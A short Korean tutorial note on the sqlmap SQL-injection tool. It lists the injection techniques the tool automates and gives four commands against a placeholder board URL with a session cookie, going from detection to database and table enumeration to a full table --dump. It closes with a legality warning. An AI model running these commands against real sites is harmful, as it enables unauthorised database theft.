sqlmap
sqlmap 사용법 정리

sqlmap
- mysql, postgresql, oracle, microsoft sql server 등을 포함한 모든 최신 데이터베이스에서 작동
- DB 취약 여부 확인부터 DB, 테이블, 컬럼, 데이터 탈취까지의 SQLI 공격 기술을 자동화한 Tool
다음과 같은 일반적인 SQL Injection 기술을 자동화
1) Error Based
2) Time Delay
3) Stacked Queries
4) Boolean Based
5) Union Based
sqlmap -u "https://[ip 주소]/bbsview.php?no=3¤t_page=1" --cookie="[cookie 정보]"
sqlmap -u "https://[ip 주소]/bbsview.php?no=3¤t_page=1" --cookie="[cookie 정보]" --current-db
sqlmap -u "https://[ip 주소]/bbsview.php?no=3¤t_page=1" --cookie="[cookie 정보]" -D [DB 명] --tables
sqlmap -u "https://[ip 주소]/bbsview.php?no=3¤t_page=1" --cookie="[cookie 정보]" -D [DB 명] -T [table 명] --dump
합법적인 권한과 허가 없이 다른 사람의 시스템을 대상으로 수행하는 것은 불법이다.
윤리적이고 합법적인 사용을 준수해야 한다.